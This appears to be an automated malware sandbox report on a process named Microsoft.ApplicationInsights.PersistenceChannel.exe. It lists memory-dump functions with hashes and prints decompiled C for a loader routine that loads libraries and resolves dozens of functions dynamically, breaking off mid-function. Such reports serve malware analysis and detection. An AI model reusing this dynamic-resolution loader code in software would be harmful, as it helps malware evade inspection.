Uniqueness Score: -1.00%

Function 02DD6FB9, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02DD7047

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fa93ad00a9e168d5e7a9d5e5058e995f69000c8ae4f3986a5f6059361a2a7d40
Instruction ID: b73be5a827d1c7c0e491ca717cc8f23efe1614bdbe40f68e96f1ee9ac0189a02
Opcode Fuzzy Hash: fa93ad00a9e168d5e7a9d5e5058e995f69000c8ae4f3986a5f6059361a2a7d40
Instruction Fuzzy Hash: C92103B59002489FDB10CFA9D584AEEBBF4EB48324F14845AE918B3350D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DD6FC0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02DD7047

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a3173be5f5359a64ff8b0227d675d7d902b59df7b6c57ad92f4a06381ba1e0ad
Instruction ID: 58039e34baeeace60db473378997d103246648f35b6188709020b71995dc8ff8
Opcode Fuzzy Hash: a3173be5f5359a64ff8b0227d675d7d902b59df7b6c57ad92f4a06381ba1e0ad
Instruction Fuzzy Hash: D021E4B59002489FDB10CF9AD584AEEFBF8FB48324F14845AE914B7350D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA8D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02DDBC61,00000800,00000000,00000000), ref: 02DDBE72

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3359c7224e66dbf9baa0c9c7b896bb42195d14c3895fc48e8ba78dfaf14cce23
Instruction ID: 203676171866adf64a1d80443e03f3b8b1e5f661bb8a669abe7655f62214c919
Opcode Fuzzy Hash: 3359c7224e66dbf9baa0c9c7b896bb42195d14c3895fc48e8ba78dfaf14cce23
Instruction Fuzzy Hash: 321103B69006488FCB10CFAAD444B9EFBF4EB88358F11852AE919A7700C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DDBE01, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,02DDBC61,00000800,00000000,00000000), ref: 02DDBE72

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ddde6379c64e3b6ac56e6a704dccd9beb24fe22f484a5f1e277e8bb6c887335f
Instruction ID: 8bbbad526de693ec44d2862b9cabc1f8e26a47bb2e406d69763bad05f1f9d7c1
Opcode Fuzzy Hash: ddde6379c64e3b6ac56e6a704dccd9beb24fe22f484a5f1e277e8bb6c887335f
Instruction Fuzzy Hash: 7A1114B69007499FDB10CFAAC444BDEFBF4AB88358F11851AD929A7700C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DDBB80, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 02DDBBE6

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 49cdafde3b46bd6e0cbcbf5e2c38293e86254e9307f1f5f96b5df0b3f5d12d15
Instruction ID: cd6c3eb7ee20bbac48e7f2de8314b44dab91b6f6dde1032f681a9aa492d1da8c
Opcode Fuzzy Hash: 49cdafde3b46bd6e0cbcbf5e2c38293e86254e9307f1f5f96b5df0b3f5d12d15
Instruction Fuzzy Hash: EC1102B5D00A498FCB10CF9AC944BDEFBF4AB88228F11841AD829B7710C775A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0112D4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.728376882.000000000112D000.00000040.00000001.sdmp, Offset: 0112D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76bc8beb557df88b0c11bbac26b360e0575aafb5c04fb8aa3669a9b36e459148
Instruction ID: a4766ca976020e437ab8fc8d3f54cb71cbeb166a881367ec1caa1701f845f05d
Opcode Fuzzy Hash: 76bc8beb557df88b0c11bbac26b360e0575aafb5c04fb8aa3669a9b36e459148
Instruction Fuzzy Hash: A5216AB1504244DFDF09CF54E9C0B26BF75FB88328F2085A9E9054B216C376D865CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0113D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.728401925.000000000113D000.00000040.00000001.sdmp, Offset: 0113D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ff006001e84a7bda84d7f1154d9c5bf94f8ae2add4861b6f133c51bc269aeb
Instruction ID: c4839299717b228659025212692db43f1f9082e363d1e39f29ce878bcf997b91
Opcode Fuzzy Hash: d5ff006001e84a7bda84d7f1154d9c5bf94f8ae2add4861b6f133c51bc269aeb
Instruction Fuzzy Hash: 402145B0504240DFCF18CF64E4C0B26FB65FBC4754F60C5A9E8094B24AC736D806CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0113D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.728401925.000000000113D000.00000040.00000001.sdmp, Offset: 0113D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d8ad06a95e79aceb905b2254386ab4cecfdde5c686459026235614c18b0dca
Instruction ID: 01614eeb4717bb709b5d9fb823ea0ec5f13fadeeb881301c11c631bd832f15ee
Opcode Fuzzy Hash: 17d8ad06a95e79aceb905b2254386ab4cecfdde5c686459026235614c18b0dca
Instruction Fuzzy Hash: 802180755083809FCB06CF64D994B11BF71EB86314F28C5DAD8498F267C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0112D4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.728376882.000000000112D000.00000040.00000001.sdmp, Offset: 0112D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d7157bd76d1d1badb8dfb6ad6c0e668467c815ef3f92f4f703d3c4288846f2
Instruction ID: 168d33b01f89bbe9bd8ad173f663e58cc83ee5b4f2d3ba6ac1450a146d2a4aad
Opcode Fuzzy Hash: a2d7157bd76d1d1badb8dfb6ad6c0e668467c815ef3f92f4f703d3c4288846f2
Instruction Fuzzy Hash: 0E11E172404280DFCF16CF44D5C4B16BF71FB84324F2482A9D8050B616C33AD46ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B0D8BE, Relevance: .5, Instructions: 534
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B0D8BE(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t310;
				void* _t319;
				void* _t334;
				void* _t357;
				void* _t364;
				void* _t438;

				_t438 = __fp0;
				_t364 = __esi;
				_t357 = __edi;
				_t334 = __edx;
				_t319 = __ecx;
				_t310 = __ebx +  *((intOrPtr*)(__ebx + 0x2d));
			}

0x00b0d8be
0x00b0d8be
0x00b0d8be
0x00b0d8be
0x00b0d8be
0x00b0d8be

Memory Dump Source

Source File: 00000000.00000002.727867366.0000000000AF2000.00000002.00020000.sdmp, Offset: 00AF0000, based on PE: true

Associated: 00000000.00000002.727852602.0000000000AF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.727900958.0000000000B26000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.727920654.0000000000B3F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01f4f20aa32d79cd5836c832ac1dbde58c7b465517c582e3f208526c93a438e2
Instruction ID: 4c2b97e49dd78f3c37692d0de38da91888e6d1a4748963aaf3dc4cb5077b18ef
Opcode Fuzzy Hash: 01f4f20aa32d79cd5836c832ac1dbde58c7b465517c582e3f208526c93a438e2
Instruction Fuzzy Hash: 8922F26240E7C18FC7138BB85CB46917FB1AE2721475E49CBC4C18F0F3E159695AD722

Uniqueness

Uniqueness Score: -1.00%

Function 02DDC088, Relevance: .5, Instructions: 528COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08cc79232efa6c8ba19a263dc1a5cee3f479d5586d443f0470cd2e0a1f677ef5
Instruction ID: a44222441156265a1c0ad2d9e07b43d543a0cde78e9500e3312473a71fa9f4eb
Opcode Fuzzy Hash: 08cc79232efa6c8ba19a263dc1a5cee3f479d5586d443f0470cd2e0a1f677ef5
Instruction Fuzzy Hash: A8526CB99C0B068FDB10CF56E8882993BF1FB61318FD04A0AD2615BAD0D37465ABDF44

Uniqueness

Uniqueness Score: -1.00%

Function 02DDA698, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.728727304.0000000002DD0000.00000040.00000001.sdmp, Offset: 02DD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da4c1e7864d077239966fc464d6a2a6356f760555fcb98a47b01e65598f2057
Instruction ID: e0afb2002a780319e35b8bb583e291e969cfb01d89f23ae8428d419f951a69a9
Opcode Fuzzy Hash: 3da4c1e7864d077239966fc464d6a2a6356f760555fcb98a47b01e65598f2057
Instruction Fuzzy Hash: 6BA18E36E006099FCF05DFA5C8445DEBBB6FF89308B15856AE805AB320EB31AD55CF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Microsoft.ApplicationInsights.PersistenceChannel.exe PID: 6340 Parent PID: 7056 Microsoft.ApplicationInsights.PersistenceChannel.exeCOMMON

Executed Functions

Function 0040B0B0, Relevance: 203.3, APIs: 135, Instructions: 820
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B0B0() {
				struct HINSTANCE__* _t2;
				CHAR* _t3;
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t6;
				CHAR* _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t10;
				CHAR* _t11;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t15;
				_Unknown_base(*)()* _t16;
				struct HINSTANCE__* _t17;
				_Unknown_base(*)()* _t19;
				CHAR* _t21;
				struct HINSTANCE__* _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t28;
				CHAR* _t31;
				CHAR* _t32;
				struct HINSTANCE__* _t34;
				CHAR* _t35;
				struct HINSTANCE__* _t37;
				CHAR* _t39;
				struct HINSTANCE__* _t41;
				CHAR* _t44;
				struct HINSTANCE__* _t46;
				CHAR* _t48;
				struct HINSTANCE__* _t50;
				CHAR* _t53;
				struct HINSTANCE__* _t55;
				struct HINSTANCE__* _t57;
				CHAR* _t58;
				struct HINSTANCE__* _t59;
				CHAR* _t62;
				struct HINSTANCE__* _t64;
				CHAR* _t67;
				struct HINSTANCE__* _t69;
				CHAR* _t72;
				struct HINSTANCE__* _t74;
				CHAR* _t77;
				struct HINSTANCE__* _t79;
				CHAR* _t82;
				struct HINSTANCE__* _t84;
				CHAR* _t87;
				CHAR* _t88;
				struct HINSTANCE__* _t90;
				CHAR* _t93;
				struct HINSTANCE__* _t95;
				CHAR* _t98;
				struct HINSTANCE__* _t100;
				CHAR* _t103;
				struct HINSTANCE__* _t105;
				CHAR* _t106;
				struct HINSTANCE__* _t108;
				CHAR* _t111;
				struct HINSTANCE__* _t113;
				CHAR* _t116;
				struct HINSTANCE__* _t118;
				CHAR* _t120;
				struct HINSTANCE__* _t122;
				CHAR* _t125;
				struct HINSTANCE__* _t127;
				CHAR* _t130;
				struct HINSTANCE__* _t132;
				CHAR* _t135;
				struct HINSTANCE__* _t137;
				CHAR* _t140;
				struct HINSTANCE__* _t142;
				CHAR* _t145;
				struct HINSTANCE__* _t147;
				CHAR* _t150;
				struct HINSTANCE__* _t152;
				CHAR* _t155;
				struct HINSTANCE__* _t157;
				CHAR* _t160;
				struct HINSTANCE__* _t162;
				CHAR* _t165;
				struct HINSTANCE__* _t167;
				CHAR* _t170;
				struct HINSTANCE__* _t172;
				CHAR* _t175;
				struct HINSTANCE__* _t177;
				CHAR* _t180;
				struct HINSTANCE__* _t182;
				CHAR* _t185;
				struct HINSTANCE__* _t187;
				CHAR* _t190;
				struct HINSTANCE__* _t192;
				CHAR* _t195;
				struct HINSTANCE__* _t197;
				CHAR* _t200;
				struct HINSTANCE__* _t202;
				CHAR* _t205;
				struct HINSTANCE__* _t207;
				CHAR* _t209;
				CHAR* _t210;
				CHAR* _t211;
				CHAR* _t212;
				CHAR* _t213;
				CHAR* _t214;
				struct HINSTANCE__* _t215;
				CHAR* _t216;
				struct HINSTANCE__* _t217;
				CHAR* _t218;
				struct HINSTANCE__* _t219;
				struct HINSTANCE__* _t220;
				struct HINSTANCE__* _t221;
				CHAR* _t222;
				struct HINSTANCE__* _t223;
				CHAR* _t224;
				struct HINSTANCE__* _t225;
				CHAR* _t226;
				struct HINSTANCE__* _t227;
				CHAR* _t228;
				struct HINSTANCE__* _t229;
				CHAR* _t230;
				CHAR* _t231;
				struct HINSTANCE__* _t232;
				CHAR* _t233;
				struct HINSTANCE__* _t234;
				CHAR* _t235;
				struct HINSTANCE__* _t236;
				CHAR* _t237;
				struct HINSTANCE__* _t238;
				CHAR* _t239;
				struct HINSTANCE__* _t240;
				CHAR* _t241;
				CHAR* _t242;
				struct HINSTANCE__* _t243;
				CHAR* _t244;
				struct HINSTANCE__* _t245;
				struct HINSTANCE__* _t246;
				CHAR* _t247;
				struct HINSTANCE__* _t248;
				CHAR* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t251;
				struct HINSTANCE__* _t252;
				struct HINSTANCE__* _t253;
				CHAR* _t254;
				struct HINSTANCE__* _t255;
				CHAR* _t256;
				struct HINSTANCE__* _t257;
				CHAR* _t258;
				CHAR* _t259;
				struct HINSTANCE__* _t260;
				CHAR* _t261;
				struct HINSTANCE__* _t262;
				CHAR* _t263;
				struct HINSTANCE__* _t264;
				CHAR* _t265;
				struct HINSTANCE__* _t266;
				CHAR* _t267;
				struct HINSTANCE__* _t268;
				CHAR* _t269;
				struct HINSTANCE__* _t270;
				CHAR* _t271;
				struct HINSTANCE__* _t272;
				CHAR* _t273;
				struct HINSTANCE__* _t274;
				CHAR* _t275;
				struct HINSTANCE__* _t276;
				CHAR* _t277;
				struct HINSTANCE__* _t278;
				CHAR* _t279;
				struct HINSTANCE__* _t280;
				CHAR* _t281;
				struct HINSTANCE__* _t282;
				CHAR* _t283;
				struct HINSTANCE__* _t284;
				CHAR* _t285;
				struct HINSTANCE__* _t286;
				CHAR* _t287;
				struct HINSTANCE__* _t288;
				CHAR* _t289;
				struct HINSTANCE__* _t290;
				CHAR* _t291;
				struct HINSTANCE__* _t292;
				CHAR* _t293;
				struct HINSTANCE__* _t294;
				CHAR* _t295;
				CHAR* _t296;
				CHAR* _t297;
				CHAR* _t298;
				CHAR* _t299;
				struct HINSTANCE__* _t300;
				struct HINSTANCE__* _t301;
				CHAR* _t302;
				struct HINSTANCE__* _t303;
				CHAR* _t304;
				struct HINSTANCE__* _t305;
				CHAR* _t306;
				CHAR* _t307;
				struct HINSTANCE__* _t308;
				CHAR* _t309;
				struct HINSTANCE__* _t310;
				CHAR* _t311;
				struct HINSTANCE__* _t312;
				CHAR* _t313;
				struct HINSTANCE__* _t314;
				CHAR* _t315;
				struct HINSTANCE__* _t316;
				struct HINSTANCE__* _t317;
				CHAR* _t318;
				CHAR* _t319;
				struct HINSTANCE__* _t320;
				CHAR* _t321;
				struct HINSTANCE__* _t322;
				CHAR* _t323;
				struct HINSTANCE__* _t324;
				CHAR* _t325;
				struct HINSTANCE__* _t326;
				CHAR* _t327;
				struct HINSTANCE__* _t328;
				struct HINSTANCE__* _t329;
				CHAR* _t330;
				struct HINSTANCE__* _t331;
				CHAR* _t332;
				struct HINSTANCE__* _t333;
				CHAR* _t334;
				struct HINSTANCE__* _t335;
				CHAR* _t336;
				struct HINSTANCE__* _t337;
				CHAR* _t338;
				CHAR* _t339;
				struct HINSTANCE__* _t340;
				CHAR* _t341;
				struct HINSTANCE__* _t342;
				CHAR* _t343;
				struct HINSTANCE__* _t344;
				struct HINSTANCE__* _t345;
				CHAR* _t346;
				struct HINSTANCE__* _t347;
				CHAR* _t348;
				struct HINSTANCE__* _t349;
				CHAR* _t350;
				struct HINSTANCE__* _t351;
				CHAR* _t352;
				struct HINSTANCE__* _t353;
				CHAR* _t354;
				struct HINSTANCE__* _t355;
				CHAR* _t356;
				struct HINSTANCE__* _t357;
				CHAR* _t358;
				struct HINSTANCE__* _t359;
				CHAR* _t360;
				struct HINSTANCE__* _t361;
				CHAR* _t362;
				struct HINSTANCE__* _t363;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				struct HINSTANCE__* _t367;
				CHAR* _t368;
				struct HINSTANCE__* _t369;
				CHAR* _t370;
				struct HINSTANCE__* _t371;
				CHAR* _t372;
				struct HINSTANCE__* _t373;
				CHAR* _t374;
				struct HINSTANCE__* _t375;
				CHAR* _t376;
				struct HINSTANCE__* _t377;
				CHAR* _t378;
				struct HINSTANCE__* _t379;
				CHAR* _t380;

				if( *0x417a30 != 0) {
					_t120 =  *0x4170b4; // 0xbb0940
					_t260 =  *0x417a30; // 0x73b60000
					 *0x417988 = GetProcAddress(_t260, _t120);
					_t346 =  *0x417718; // 0xbb0ad8
					_t122 =  *0x417a30; // 0x73b60000
					 *0x4179f8 = GetProcAddress(_t122, _t346);
					_t261 =  *0x4172b8; // 0xbae438
					_t347 =  *0x417a30; // 0x73b60000
					 *0x417990 = GetProcAddress(_t347, _t261);
					_t125 =  *0x417658; // 0xbb0bf8
					_t262 =  *0x417a30; // 0x73b60000
					 *0x417898 = GetProcAddress(_t262, _t125);
					_t348 =  *0x4175cc; // 0xbb0bb0
					_t127 =  *0x417a30; // 0x73b60000
					 *0x4178ec = GetProcAddress(_t127, _t348);
					_t263 =  *0x417268; // 0xbb0bc8
					_t349 =  *0x417a30; // 0x73b60000
					 *0x4178a0 = GetProcAddress(_t349, _t263);
					_t130 =  *0x41763c; // 0xbb0c58
					_t264 =  *0x417a30; // 0x73b60000
					 *0x417a58 = GetProcAddress(_t264, _t130);
					_t350 =  *0x4174b0; // 0xbb0b98
					_t132 =  *0x417a30; // 0x73b60000
					 *0x4178e4 = GetProcAddress(_t132, _t350);
					_t265 =  *0x417130; // 0xbb0c10
					_t351 =  *0x417a30; // 0x73b60000
					 *0x417994 = GetProcAddress(_t351, _t265);
					_t135 =  *0x4172b0; // 0xbb0c40
					_t266 =  *0x417a30; // 0x73b60000
					 *0x417a3c = GetProcAddress(_t266, _t135);
					_t352 =  *0x4177ac; // 0xbb50f8
					_t137 =  *0x417a30; // 0x73b60000
					 *0x4179ac = GetProcAddress(_t137, _t352);
					_t267 =  *0x417494; // 0xbb50e0
					_t353 =  *0x417a30; // 0x73b60000
					 *0x4179e4 = GetProcAddress(_t353, _t267);
					_t140 =  *0x4174f4; // 0xbb5098
					_t268 =  *0x417a30; // 0x73b60000
					 *0x4178b4 = GetProcAddress(_t268, _t140);
					_t354 =  *0x4173a4; // 0xbb5068
					_t142 =  *0x417a30; // 0x73b60000
					 *0x417a64 = GetProcAddress(_t142, _t354);
					_t269 =  *0x4171c0; // 0xbae178
					_t355 =  *0x417a30; // 0x73b60000
					 *0x41796c = GetProcAddress(_t355, _t269);
					_t145 =  *0x4171f8; // 0xbb5080
					_t270 =  *0x417a30; // 0x73b60000
					 *0x417974 = GetProcAddress(_t270, _t145);
					_t356 =  *0x41779c; // 0xbae118
					_t147 =  *0x417a30; // 0x73b60000
					 *0x417a74 = GetProcAddress(_t147, _t356);
					_t271 =  *0x4175e8; // 0xbae548
					_t357 =  *0x417a30; // 0x73b60000
					 *0x4178e0 = GetProcAddress(_t357, _t271);
					_t150 =  *0x4170dc; // 0xbb4ff0
					_t272 =  *0x417a30; // 0x73b60000
					 *0x417a88 = GetProcAddress(_t272, _t150);
					_t358 =  *0x417308; // 0xbae278
					_t152 =  *0x417a30; // 0x73b60000
					 *0x417858 = GetProcAddress(_t152, _t358);
					_t273 =  *0x417654; // 0xbb5008
					_t359 =  *0x417a30; // 0x73b60000
					 *0x4178d8 = GetProcAddress(_t359, _t273);
					_t155 =  *0x41704c; // 0xbae078
					_t274 =  *0x417a30; // 0x73b60000
					 *0x417a90 = GetProcAddress(_t274, _t155);
					_t360 =  *0x417218; // 0xbae098
					_t157 =  *0x417a30; // 0x73b60000
					 *0x417a68 = GetProcAddress(_t157, _t360);
					_t275 =  *0x4170f0; // 0xbb5038
					_t361 =  *0x417a30; // 0x73b60000
					 *0x417a18 = GetProcAddress(_t361, _t275);
					_t160 =  *0x417134; // 0xbb4ee8
					_t276 =  *0x417a30; // 0x73b60000
					 *0x417950 = GetProcAddress(_t276, _t160);
					_t362 =  *0x417458; // 0xbb4ed0
					_t162 =  *0x417a30; // 0x73b60000
					 *0x4178cc = GetProcAddress(_t162, _t362);
					_t277 =  *0x41754c; // 0xbb4f30
					_t363 =  *0x417a30; // 0x73b60000
					 *0x417854 = GetProcAddress(_t363, _t277);
					_t165 =  *0x417190; // 0xbae0b8
					_t278 =  *0x417a30; // 0x73b60000
					 *0x417948 = GetProcAddress(_t278, _t165);
					_t364 =  *0x417524; // 0xbb5110
					_t167 =  *0x417a30; // 0x73b60000
					 *0x417a98 = GetProcAddress(_t167, _t364);
					_t279 =  *0x4175c4; // 0xbb4fa8
					_t365 =  *0x417a30; // 0x73b60000
					 *0x41790c = GetProcAddress(_t365, _t279);
					_t170 =  *0x417264; // 0xbb4fd8
					_t280 =  *0x417a30; // 0x73b60000
					 *0x417894 = GetProcAddress(_t280, _t170);
					_t366 =  *0x4173f4; // 0xbae0d8
					_t172 =  *0x417a30; // 0x73b60000
					 *0x417880 = GetProcAddress(_t172, _t366);
					_t281 =  *0x4173a0; // 0xbb4f18
					_t367 =  *0x417a30; // 0x73b60000
					 *0x4178ac = GetProcAddress(_t367, _t281);
					_t175 =  *0x417048; // 0xbb4f00
					_t282 =  *0x417a30; // 0x73b60000
					 *0x4178f0 = GetProcAddress(_t282, _t175);
					_t368 =  *0x4176a0; // 0xbb50b0
					_t177 =  *0x417a30; // 0x73b60000
					 *0x41789c = GetProcAddress(_t177, _t368);
					_t283 =  *0x417450; // 0xbb5188
					_t369 =  *0x417a30; // 0x73b60000
					 *0x4179b0 = GetProcAddress(_t369, _t283);
					_t180 =  *0x417360; // 0xbb51a0
					_t284 =  *0x417a30; // 0x73b60000
					 *0x417a94 = GetProcAddress(_t284, _t180);
					_t370 =  *0x417548; // 0xbae2f8
					_t182 =  *0x417a30; // 0x73b60000
					 *0x417890 = GetProcAddress(_t182, _t370);
					_t285 =  *0x41713c; // 0xbae198
					_t371 =  *0x417a30; // 0x73b60000
					 *0x41788c = GetProcAddress(_t371, _t285);
					_t185 =  *0x417424; // 0xbb5020
					_t286 =  *0x417a30; // 0x73b60000
					 *0x4179f4 = GetProcAddress(_t286, _t185);
					_t372 =  *0x41741c; // 0xbb5128
					_t187 =  *0x417a30; // 0x73b60000
					 *0x4179a8 = GetProcAddress(_t187, _t372);
					_t287 =  *0x41702c; // 0xbae0f8
					_t373 =  *0x417a30; // 0x73b60000
					 *0x417a78 = GetProcAddress(_t373, _t287);
					_t190 =  *0x417184; // 0xbae480
					_t288 =  *0x417a30; // 0x73b60000
					 *0x417978 = GetProcAddress(_t288, _t190);
					_t374 =  *0x417118; // 0xbb50c8
					_t192 =  *0x417a30; // 0x73b60000
					 *0x4178b0 = GetProcAddress(_t192, _t374);
					_t289 =  *0x4171a4; // 0xbb5140
					_t375 =  *0x417a30; // 0x73b60000
					 *0x41784c = GetProcAddress(_t375, _t289);
					_t195 =  *0x4173fc; // 0xbae318
					_t290 =  *0x417a30; // 0x73b60000
					 *0x417984 = GetProcAddress(_t290, _t195);
					_t376 =  *0x417644; // 0xbae338
					_t197 =  *0x417a30; // 0x73b60000
					 *0x4178d4 = GetProcAddress(_t197, _t376);
					_t291 =  *0x4173d8; // 0xbae138
					_t377 =  *0x417a30; // 0x73b60000
					 *0x417840 = GetProcAddress(_t377, _t291);
					_t200 =  *0x4172d8; // 0xbb5158
					_t292 =  *0x417a30; // 0x73b60000
					 *0x417848 = GetProcAddress(_t292, _t200);
					_t378 =  *0x4175e4; // 0xbae1b8
					_t202 =  *0x417a30; // 0x73b60000
					 *0x417908 = GetProcAddress(_t202, _t378);
					_t293 =  *0x417770; // 0xbb5170
					_t379 =  *0x417a30; // 0x73b60000
					 *0x417954 = GetProcAddress(_t379, _t293);
					_t205 =  *0x4170d8; // 0xbb97d0
					_t294 =  *0x417a30; // 0x73b60000
					 *0x4179f0 = GetProcAddress(_t294, _t205);
					_t380 =  *0x41769c; // 0xbb9870
					_t207 =  *0x417a30; // 0x73b60000
					 *0x41787c = GetProcAddress(_t207, _t380);
				}
				_t209 =  *0x41703c; // 0xbb08f8
				 *0x417940 = LoadLibraryA(_t209);
				_t295 =  *0x4171e4; // 0xbb08b0
				_t2 = LoadLibraryA(_t295); // executed
				 *0x4178c0 = _t2;
				_t3 =  *0x4175ec; // 0xbb0b08
				_t4 = LoadLibraryA(_t3); // executed
				 *0x417a70 = _t4;
				_t210 =  *0x4172bc; // 0xbb09a0
				 *0x417964 = LoadLibraryA(_t210);
				_t296 =  *0x41723c; // 0xbb08c8
				_t6 = LoadLibraryA(_t296); // executed
				 *0x417a14 = _t6;
				_t7 =  *0x41776c; // 0xbb0aa8
				_t8 = LoadLibraryA(_t7); // executed
				 *0x417928 = _t8;
				_t211 =  *0x4171e0; // 0xbb09b8
				_t9 = LoadLibraryA(_t211); // executed
				 *0x417a08 = _t9;
				_t297 =  *0x417560; // 0xbb0a78
				_t10 = LoadLibraryA(_t297); // executed
				 *0x417a4c = _t10;
				_t11 =  *0x4170a4; // 0xbb0a90
				_t12 = LoadLibraryA(_t11); // executed
				 *0x417944 = _t12;
				_t212 =  *0x417594; // 0xbb0ac0
				_t13 = LoadLibraryA(_t212); // executed
				 *0x417a60 = _t13;
				_t298 =  *0x417678; // 0xbb0c28
				_t14 = LoadLibraryA(_t298); // executed
				 *0x417914 = _t14;
				_t15 =  *0x417228; // 0xbb0be0
				_t16 = LoadLibraryA(_t15); // executed
				 *0x417958 = _t16;
				if( *0x417940 != 0) {
					_t259 =  *0x417498; // 0xbb2db0
					_t345 =  *0x417940; // 0x770b0000
					_t16 = GetProcAddress(_t345, _t259);
					 *0x417a24 = _t16;
				}
				if( *0x4178c0 != 0) {
					_t106 =  *0x417488; // 0xbb4f48
					_t253 =  *0x4178c0; // 0x6f710000
					 *0x417930 = GetProcAddress(_t253, _t106);
					_t339 =  *0x417258; // 0xbb96d0
					_t108 =  *0x4178c0; // 0x6f710000
					 *0x417a40 = GetProcAddress(_t108, _t339);
					_t254 =  *0x417528; // 0xbb9a10
					_t340 =  *0x4178c0; // 0x6f710000
					 *0x417a80 = GetProcAddress(_t340, _t254);
					_t111 =  *0x417558; // 0xbb9830
					_t255 =  *0x4178c0; // 0x6f710000
					 *0x417a10 = GetProcAddress(_t255, _t111);
					_t341 =  *0x4173d0; // 0xbb4eb8
					_t113 =  *0x4178c0; // 0x6f710000
					 *0x417a8c = GetProcAddress(_t113, _t341);
					_t256 =  *0x417238; // 0xbb9a30
					_t342 =  *0x4178c0; // 0x6f710000
					 *0x41792c = GetProcAddress(_t342, _t256);
					_t116 =  *0x41755c; // 0xbb98b0
					_t257 =  *0x4178c0; // 0x6f710000
					 *0x41795c = GetProcAddress(_t257, _t116);
					_t343 =  *0x417454; // 0xbb96f0
					_t118 =  *0x4178c0; // 0x6f710000
					 *0x41783c = GetProcAddress(_t118, _t343);
					_t258 =  *0x417274; // 0xbb9910
					_t344 =  *0x4178c0; // 0x6f710000
					_t16 = GetProcAddress(_t344, _t258);
					 *0x417934 = _t16;
				}
				if( *0x417a70 != 0) {
					_t88 =  *0x417314; // 0xbb4f60
					_t246 =  *0x417a70; // 0x745c0000
					 *0x417860 = GetProcAddress(_t246, _t88);
					_t332 =  *0x41762c; // 0xbb4f78
					_t90 =  *0x417a70; // 0x745c0000
					 *0x417980 = GetProcAddress(_t90, _t332);
					_t247 =  *0x4175f8; // 0xbb9710
					_t333 =  *0x417a70; // 0x745c0000
					 *0x4179c0 = GetProcAddress(_t333, _t247);
					_t93 =  *0x417520; // 0xbb9970
					_t248 =  *0x417a70; // 0x745c0000
					 *0x4179d0 = GetProcAddress(_t248, _t93);
					_t334 =  *0x4173e8; // 0xbb4fc0
					_t95 =  *0x417a70; // 0x745c0000
